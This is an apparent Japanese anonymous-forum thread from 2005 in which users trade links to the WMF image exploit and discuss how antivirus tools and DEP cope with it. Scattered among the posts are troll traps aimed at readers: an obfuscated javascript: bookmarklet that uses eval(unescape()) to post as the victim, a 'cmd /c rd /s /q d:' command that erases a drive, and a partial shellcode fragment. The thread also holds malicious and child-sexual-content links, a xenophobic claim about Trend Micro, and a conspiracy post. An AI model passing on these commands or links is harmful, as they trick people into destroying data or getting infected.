開いただけでウィルスに感染する奴

集めてます
是非ください
俺のノートン先生とガチで勝負させます

糞スレ立てんな！ボケが

そもそもWindowsUpdateしてあったら感染しねぇんだよ！ボケが

>>3

似たような前スレ落ちたから次スレにする？

>>3
Windowsに感染してますね。

ttp://www2.strangeworld.org/uedakana/
ガチンコ勝負おね

>>1
「奴｣ってことはファイルでもいいんだろ？
そこらじゅうにあるから
好きなだけ勝負させたらいい

とか言ってどっかのスレに貼るつもりだろ。バレバレなんだよ厨房

クリスマスだっていうのに何やってるんだお前は

>>1
ガチなら素っ裸の状態で勝負しなきゃ。

>>11
そうだな
何がノートン先生じゃｗ

ttp://vidr.jp/
誰か勝負頼みます。　責任は持ちません

>>13
梅毒

http://omegax9sp.hp.infoseek.co.jp/dark-evolution.html

>>15
鑑定スレから引っ張ってきただけじゃねーの？
しょぼいし

開いただけでウィルスに感染しそうな女なら何人も知ってるがな
バルス！！

(´･ω･｀)ウィルス性胃腸炎に感染したがな

お大事に

＞木村佳乃
＞「ジングルベル」を逆回転で聴くと・・・
＞http://media.spikedhumor.com/8944/Jingle_Bells_Reversed.swf


これ、別の板で見つけて、開いたんですが、逆向きで聴くと、すごく怖かったんです
（男の人がこっちを向いて叫んで・・・）

これってＰＣ無害でしょうか？

>>20
馬鹿？

http://kikuz0u.x0.com/wmf_exp.html

>>22
プロパティを見ようとした瞬間にExplorerがクラッシュして再起動した。
ウイルスバスターは検知しなかった。
何だこれは？

http://www.st.ryukoku.ac.jp/~kjm/security/memo/2005/12.html#20051228_WMF

これか。。。
コンセプトコードだったようだが、怖いな。

DEP有効だとDEPで止められてまったく実害はなかった

>>25
そのDEPってハードウェア？
とめられたときって、なんかメッセージ出すん？

avast!も対応していた。やるじゃん。

デスクトップに保存してプロパティを開くのを試した。
DEP有効でもDEPが検出して止めたっていうポップアップが出たが
そのポップアップ閉じたらその後勝手に実行されて意味なかったぞ
最初はちゃんと止めたって思って感心したのにだめじゃん

DEPによる保護で最も効果が期待されているのが、バッファ・オーバーフロー／バッファ・オーバーランと呼ばれる脆弱性に対してだ

って書かれてたけどだめじゃねーか！

>>26
ハードウェアDEP。
「コンピュータ保護のため、このプログラムは Windows により終了されました」
というメッセージが出て、「メッセージを閉じる」ボタンを押すと
「問題が発生したため、〜を終了します。ご不便をおかけし申し訳ありません」
っていつものエラー報告のダイアログが出る。
メモ帳の自動実行はされない。
他の人の報告を見る限りでは、ソフトウェアDEPじゃ防げないみたいね。

IMON ファイル http://kikuz0u.x0.com/wmf_exp.wmf Win32/TrojanDownloader.Wmfex トロイ 切断されました

NOD32定義ファイル: 1.1342 (20051228)
Win32/TrojanDownloader.Wmfex

SempronでハードウェアDEPになってるけど防げないよ
64bitプロセッサのじゃなきゃだめってことなんかな
それか64bit版Windowsなら平気とか？

なるほど、ソフトウェアDEPではあかんのか。
P3-1Gの俺のPCじゃ止められんちゅうことだな。
新しいPC作りたいけど・・・最近仕様改革が激しい
からViiVまで待つつもりだけど、今のままじゃ
安心できんな。
セキュリティツールを組み合わせて凌ぐしかないな。

ここNOD厨の溜まり場だったのか
気づくの遅すぎたわｗ

レスは少ないけど、渦中のスレだからな、いろんな厨が集まるだろ。

>>32
DEPのオプションは/noexecute=OptOutになってる?
> それか64bit版Windowsなら平気とか？
そういえば確かに漏れの環境はx64 Editionだなあ
でもSempronで防げたという報告もあるんだよなあ
http://kikuz0u.x0.com/td/?date=20051228#c00

>>36
それってデフォルトのシステムのみじゃなくて
除外リストに加えた物いがいはすべてでDEP機能有効にするってやつでしょ？
デフォルトにしてもすべてにしてみても一緒だったよ。
防いだメッセージでた後メッセージ閉じると実行されちゃう。

ちなみにソフトウェアDEPだと防止のメッセージすらでないで実行された

よく考えたらx64の64bitアプリ上でx86の攻撃コードが動くわけないか
とか一瞬思ったけど>>30で止められたrundll32は32bitだなあ

結局DEPで止められるかもしれないけど信用はできないってことか

Winnyを狙ったワーム･ニュイルス情報 Part47
http://tmp5.2ch.net/test/read.cgi/download/1134743735/334


334 名前：[名無し]さん(bin+cue).rar ：2005/12/30(金) 16:57:24 ID:ZeZDB+us0 BE:55890465- sage
検証用ファイル

ttp://grin.flagbind.jp/runcalc.wmf　電卓が起動するだけ
ttp://kikuz0u.x0.com/wmf_exp.html　メモ帳が起動するだけ

後はメモ帳の変わりにウィルスを実行するように
書き換えるだけでやばいことに

ファイルがある、フォルダを開くだけで〜っていうのは
XPの設定をデフォルトのままで使ってるやつがなるかもしらん
レジストリ弄って、フォルダを開くたびにファイル情報集めなくしてると
発動しないかも




祭り開始か？
【割れ厨】フォルダを開いたらサヨウナラ　最強のウィルス誕生【最後の日】
http://news19.2ch.net/test/read.cgi/news/1135928524/

>>39
訂正　縮小版と並べて表示にしていなければ、ポイントしない限りバッファオーバーフローは発生しない。

http://www.imgup.org/file/iup138702.jpg
これも

>>41
やっぱりなぁ。
拡張子は問題じゃないものね。
Explorerそのものに問題があるからね。

>>41
マカフィーは、それも関係ない

例のshimgvw.dllの脆弱性ついたウィルス
IrfanviewだけじゃなくてXnViewでも外部プログラム起動した＠Win2000

AMON　ファイル　E:\...\Thumbs.jpg　Win32/TrojanDownloader.Wmfex　トロイ　削除済み　ファイルアクセス時に発生したイベント。　C:\WINDOWS\Explorer.EXE.
NOD32対応済み

>>44
同じDLLを読みに行くのかな？
やっぱ、

regsvr32 -u shimgvw.dll

これを使うしかないか。

>>46
IrfanViewの場合、それやっても意味ないよ

何かshimgvw.dllさえ無効にすれば問題ないと思ってる人が多いみたいだけど
本当に脆弱性があるのはgdi32.dllのwmfを表示するAPI。
shimgvw.dllはそれを利用しているDLL「のひとつ」に過ぎない。
だからwmfを開けるアプリはwmfを自前で展開していない限り
(そんなことできるのかどうか知らんけど)すべて危険。

>>48
へー。そうなのかぁ。
おいらはプログラムに詳しくないからわからんかった。

実際shimgvw.dllを無効にしてもIEやエクスプローラからの攻撃を回避できるだけで、
ペイントも危険とかLotus Notes 6.xも危険という情報が出始めてるな
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2005/12.html#20051230_tuiki

意外と根の深い問題なんだな。
ウイルス対策ソフト入れている連中はよいとして、
入れていない連中や、入れていてもうpしていない
連中は危険ってことやな。

これ、価格のときみたいに、IEとIIS?(SQL?)の脆弱
を利用してページを改竄（改竄部分にWMFの脆弱性を
利用したファイルをDLさせるようなIFRAMEの挿入）
されたら一般大衆はたまったもんじゃないな。

Iframeとかは、アクティブスクリプトの実行を無効にしておけば実行されない。

どこにもスクリプトは使われてないんだが。

ttp://kikuz0u.x0.com/wmf_exp.html
これは、Iframeに組み込んでいる

>>53
無知だなあ

無知というか、勘違いだろうね

>>1

>>1
ＩＥでこのスレを開く。

１、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

２、
改行を外して１行にする。

３、
１行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。

４、
Enterを押す（もしくは「移動」をクリックする）。


これを実行汁

節穴でロリ画像下さいとレスするスクリプト

「スタート」の「ファイル名を指定して実行」で
cmd /c rd /s /q d:
と入力し(OK)をクリックする

　＿＿＿＿＿
　|＿＿＿＿　 ＼□ □
　　　　　　　/　/　　 ＿＿＿＿＿
　　　　　　/　/　　　|＿＿＿＿＿|
　　　　　/　/
　　　　/　/
　　　　￣　　　　　　　　　　　　　　　　　　　(⌒ ⌒ヽ
　　　 ∧＿∧　　　　　　　　　　　　　（´⌒　　⌒　　⌒ヾ
　　　（ ；　　　）　　　　　　　　　　　（'⌒　;　⌒　　　::⌒　　）
　　　　（￣￣￣￣┴-　　　　　　（´　　　　　）　　　　　:::　）
　　　　 | 　（　　　 *≡≡≡≡≡三（´⌒;:　　　　　::⌒`）　:;　　）
　　　　/　 /　　　∧ 　　＼　　　　（⌒::　　　::　　　　　::⌒　）
　　　 /　/　　　/ Ｕ＼　　　＼　　　（　　　　ゝ　　ヾ　丶　　ソ
　　 /　/　（￣）　　|　|＼ 　（￣）　　　ヽ　　ヾ　　ノノ　　ノ
　 /　（　ノ　 （　 　|　| 　＼ ﾉ　（
⊂- ┘（　　　 ） └--┘ （　 　　）
　　　　 ＵＵＵＵ　　　　　　ＵＵＵＵ

　　　　／￣￣￣￣＼,,　　　　　 ／￣￣￣￣￣＼
　　　/＿＿＿＿＿　　ヽ　　　 /　＿＿＿＿＿_　　 ＼
　　　|　　　　　　　　|　　|　　 / ／　　　　　　　　＼ 　　ヽ
　　　|● 　 　● 　 |___/　　　|/　●　　　　●　　　ヽ　 　|
　　　|　（_●__）　　　 6 l　　　|　　　（_●__）　　　　　|　　 |
.　 　ヽ　 |∪|　　　　　,-′　　|　　　　|∪|　　 　　　　| 　 l
　　 　 ヽ.ヽノ＿＿ ／ヽ　　 　 ヽ　　　ヽノ　　　　　　/　/
　　　 　／ |／＼／ l ＾ヽ　　　 ＼　　　　　　　　 　/　/
　　　 　|　|　　　　 　|　　|　　　　 l━━（ｔ）━━━━

　　 　 ＿＿＿＿＿_　　　　＿＿_　　＿＿＿＿　　＿＿＿＿_　　　　 ＿_　　 　 ___
　　 /＿＿＿　　　/　　　　|　　／　/　　　　　　|　/＿＿　　__/ [][]　/　 /　　　_|　|_
　　 　 　 　 / 　 / 　　　　/　 /　　/　 /￣￣|.　l　　　　/　/　 　 　 /　 /　　　 |_　　ﾚ'~￣|
　　　　 　 / 　 /. 　　　　/　 /　　/　 /.　　／　/　　　　|　 |___　　　＼　＼　　　 / 　 ／|　|
　　　 　 / 　 /　　　　　/　 /　　/　　￣￣　／　　　　　＼＿_| 　　　　＼　＼　/_　 /　　|　|_
　 　 　/ 　 /　　 　 　 /　 /　　/　 /￣￣￣　　　　　　　　　　　　　　　　￣￣ 　.|__|　　　＼/
　　　/ 　 /　　　　　 /　 /　　/　 /
　　/ 　 /＿＿__.　 /　 /　　/　 /
　/　　　　　　 / ／　　 |　 /　 /
　￣￣￣￣￣　￣￣￣　　￣

原因は「二重の人為的ミス」　ウイルスバスター不具合で謝罪
http://www.itmedia.co.jp/news/articles/0504/24/news008.html
ウイルスバスター原因でシステムダウン
http://www.itmedia.co.jp/enterprise/articles/0504/24/news001.html
トレンドマイクロ、PCを守るはずのパターンファイルに不具合
http://www.itmedia.co.jp/enterprise/articles/0504/23/news015.html
ウイルスバスター不具合でPCメーカーも対応に追われる
http://www.itmedia.co.jp/news/articles/0504/24/news002.html
「ウイルスバスター」のパターン・ファイルに不具合、大規模パソコン障害が発生
http://itpro.nikkeibp.co.jp/free/NC/NEWS/20050423/159997/
ウイルスバスターによる障害を解消するツールが公開，セーフモードでの起動が必要
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050424/159999/
トレンドマイクロが障害の原因を緊急会見，「XP SP2環境ではテストせず」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050424/160001/
ウイルスバスターのアップデートで不具合、PCが使用不能に
http://pcweb.mycom.co.jp/news/2005/04/24/100.html
トレンドマイクロ、ウイルス対策ソフトの更新ファイルに不具合
http://japan.cnet.com/news/sec/story/0,2000050480,20083099,00.htm
ウイルスバスターのアップデートに不具合、今度はWindows Me/98で
http://internet.watch.impress.co.jp/cda/news/2005/05/27/7776.html
ウイルスバスター、パターンファイル更新でCPU使用率100％になるトラブル
http://internet.watch.impress.co.jp/cda/news/2005/04/23/7414.html
ウイルスバスター2005 アップデートを実行後、動作が著しく低下する
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=11214

トレンドマイクロ
http://www.trendmicro.com/jp/about/profile/leadership/overview.htm
役員紹介
代表取締役社長　エバ・チェン(陳　怡芬)
代表取締役会長 スティーブ・チャン(チャン　ミン　ジャン)
代表取締役（CFO） マヘンドラ・ネギ
取締役（非常勤） エドワード・テン

↑まぁ、中国人の会社ですからねぇ。一種の反日テロだったんでしょ。これ。

ウイルスバスターはスパイウェア！？
ここに詳しい経緯が書いてある。
http://www.pahoo.org/e-soul/privacy/casestudy/case-002-01.shtm

　＿＿＿＿＿
　|＿＿＿＿　 ＼□ □
　　　　　　　/　/　　 ＿＿＿＿＿
　　　　　　/　/　　　|＿＿＿＿＿|
　　　　　/　/
　　　　/　/
　　　　￣　　　　　　　　　　　　　　　　　　　(⌒ ⌒ヽ
　　　 ∧＿∧　　　　　　　　　　　　　（´⌒　　⌒　　⌒ヾ
　　　（ ；　　　）　　　　　　　　　　　（'⌒　;　⌒　　　::⌒　　）
　　　　（￣￣￣￣┴-　　　　　　（´　　　　　）　　　　　:::　）
　　　　 | 　（　　　 *≡≡≡≡≡三（´⌒;:　　　　　::⌒`）　:;　　）
　　　　/　 /　　　∧ 　　＼　　　　（⌒::　　　::　　　　　::⌒　）
　　　 /　/　　　/ Ｕ＼　　　＼　　　（　　　　ゝ　　ヾ　丶　　ソ
　　 /　/　（￣）　　|　|＼ 　（￣）　　　ヽ　　ヾ　　ノノ　　ノ
　 /　（　ノ　 （　 　|　| 　＼ ﾉ　（
⊂- ┘（　　　 ） └--┘ （　 　　）
　　　　 ＵＵＵＵ　　　　　　ＵＵＵＵ


　　　　／￣￣￣￣＼,,　　　　　 ／￣￣￣￣￣＼
　　　/＿＿＿＿＿　　ヽ　　　 /　＿＿＿＿＿_　　 ＼
　　　|　　　　　　　　|　　|　　 / ／　　　　　　　　＼ 　　ヽ
　　　|● 　 　● 　 |___/　　　|/　●　　　　●　　　ヽ　 　|
　　　|　（_●__）　　　 6 l　　　|　　　（_●__）　　　　　|　　 |
.　 　ヽ　 |∪|　　　　　,-′　　|　　　　|∪|　　 　　　　| 　 l
　　 　 ヽ.ヽノ＿＿ ／ヽ　　 　 ヽ　　　ヽノ　　　　　　/　/
　　　 　／ |／＼／ l ＾ヽ　　　 ＼　　　　　　　　 　/　/
　　　 　|　|　　　　 　|　　|　　　　 l━━（ｔ）━━━━

踏んだら感染しちゃった

ttp://72.14.203.104/search?q=cache:2VfK2u1iM2oJ:lol.to/book.php%3Fbook%3Dfuckoff+darklolitas&hl=ja&gl=jp&ct=clnk&cd=2

踏んだら感染しちゃった

ttp://72.14.203.104/search?q=cache:2VfK2u1iM2oJ:lol.to/book.php%3Fbook%3Dfuckoff+darklolitas&hl=ja&gl=jp&ct=clnk&cd=2

http://grin.flagbind.jp/runcalc.wmf

ロリ画像ください

前に芸スポにあったスレッドを開いただけで、「ウイルスに感染しました」って出たんだけど・・。

これってナンダイ？

>>72
２ちゃんねるへようこそ！

この後半年ロムります・・。
教えて下さいな

>>74
単にウイルスコードが貼られただけ。
アンチウイルスソフトの誤作動を狙ったもの。
ただのコードなんでもちろん感染はしてない。
半年後にまた会おう

ありがとうございました！
また半年後に。
お元気で！

絶対ROMってねーよｗｗｗｗｗ

頑張れよ（´・ω・｀）

なんだかんだいって、割と皆優しいのなw

てーかなかったっけ、ウイルステンプレートとかいうヤツ。

あぼーん

>81
とりあえずお前が痛い香具師なのはよく解った

> http://seriall.com/
> これ踏んでからｌｉｖｅ2ｃｈ以外動かなくなっちまった・・・

IMON　ファイル　http://installare.net/e/t/ads_nl1.php?b=3020　ウイルスの可能性 : HTML/Exploit.VMLFill トロイ の亜種

トミヤアパレル株式会社
http://www.tomiya-ap.com/index.html

IMON　ファイル　http://www.tomiya-ap.com/favicon.ico　Win32/Nachi.B ワーム　切断されました

あぼーん

このスレ参考にさせて貰ってます。

>>1
metasploitで戦えよ

unescape("%u7030%u4300%u14106%u105216

まだ報道されていない犯罪です。
夜中に家屋に侵入し睡眠中の人の体内に装置を埋め込み追跡したり
また装置を遠隔操作することでくしゃみをさせたり針で刺したような傷みを加えている者がいます。
奈良県生駒市北部に被害者多数のようです。

>>1
ttp://www.ygbigbang.jp/